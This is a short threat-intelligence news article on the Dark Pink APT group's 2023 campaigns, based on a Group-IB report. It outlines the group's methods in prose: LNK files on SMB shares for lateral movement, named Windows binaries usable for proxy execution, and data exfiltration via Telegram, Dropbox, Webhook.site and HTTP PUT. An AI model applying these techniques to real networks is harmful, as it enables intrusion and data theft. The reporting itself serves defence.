In 2023, the Dark Pink APT cyber group has been spotted targeting government, military, and education organisations in Indonesia, Brunei, and Vietnam.
The threat group has been active since at least mid-2021, primarily targeting companies in the Asia-Pacific region, but it was initially revealed by a Group-IB report in January 2023.
After analyzing indicators of earlier activity by the threat actor, the researchers identified more breaches against an educational institute in Belgium and a military entity in Thailand. One of these PowerShell scripts is essential to Dark Pink's lateral movement approach, assisting in the identification and interaction with SMB shares on the network.
The script downloads a ZIP archive from GitHub, saves it to a local directory, and then creates LNK files on each SMB share that is linked to the malicious executable contained in the package. When these LNK files are opened, the malicious executable is launched, accelerating Dark Pink's spread across the network and extending its reach to new systems.
Dark Pink also employs PowerShell instructions to detect the existence of legitimate software and development tools on the infected device, which they can then exploit.
These tools include 'AccCheckConsole.exe,''remote.exe,' 'Extexport.exe,' 'MSPUB.exe,' and 'MSOHTMED.exe,' all of which can be used for proxy execution, downloading additional payloads, and other malicious activities.
However, Group-IB states that it has not seen any instances of these tools being abused in the detected assaults. As per Group-IB, Dark Pink's data exfiltration mechanism has evolved beyond simply sending ZIP archives to Telegram conversations.
The attackers exploited DropBox uploads in some circumstances, while in others, they used HTTP exfiltration via a temporary endpoint built using the "Webhook.site" service or Windows servers.
The previously described scripts also have the ability to exfiltrate data by creating new WebClient objects and utilizing the PUT technique to transfer files to an external address after identifying the location of the target files on the compromised computer.
Group-IB assesses that the Dark Pink threat actors have not been deterred by their past exposure and are unlikely to change their ways now. The attackers will very certainly continue to improve their tools and diversify their approaches as much as possible.
